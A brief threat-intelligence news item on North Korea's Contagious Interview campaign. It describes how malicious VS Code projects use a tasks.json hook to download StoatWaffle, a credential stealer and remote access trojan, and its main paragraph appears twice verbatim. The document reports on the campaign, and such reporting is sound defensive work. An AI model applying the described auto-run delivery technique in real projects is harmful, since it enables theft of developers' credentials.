North Korean threat operation WaterPlum, which runs the Contagious Interview campaign, has leveraged malicious VS Code projects to deliver the new StoatWaffle malware since December, reports The Hacker News.
Installation of the illicit repository triggers the reading of a tasks.json file, which downloads data from a Vercel web app regardless of the executing operating system, findings from NTT Security researchers showed. After ensuring the deployment of Node.js within the targeted environment, the payload launches a downloader that retrieves StoatWaffle, which injects a stealer module that exfiltrates browser-stored credentials and extension data and the iCloud Keychain database on macOS, in addition to a remote access trojan. Such findings come as North Korean hackers were reported by Microsoft researchers to have harnessed seemingly legitimate recruitment processes to spread the OtterCookie, InvisibleFerret, and FlexibleFerret backdoors as part of the Contagious Interview campaign. "By embedding targeted malware delivery directly into interview tools, coding exercises, and assessment workflows developers inherently trust, threat actors exploit the trust job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance," said Microsoft.
Installation of the illicit repository triggers the reading of a tasks.json file, which downloads data from a Vercel web app regardless of the executing operating system, findings from NTT Security researchers showed. After ensuring the deployment of Node.js within the targeted environment, the payload launches a downloader that retrieves StoatWaffle, which injects a stealer module that exfiltrates browser-stored credentials and extension data and the iCloud Keychain database on macOS, in addition to a remote access trojan. Such findings come as North Korean hackers were reported by Microsoft researchers to have harnessed seemingly legitimate recruitment processes to spread the OtterCookie, InvisibleFerret, and FlexibleFerret backdoors as part of the Contagious Interview campaign. "By embedding targeted malware delivery directly into interview tools, coding exercises, and assessment workflows developers inherently trust, threat actors exploit the trust job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance," said Microsoft.





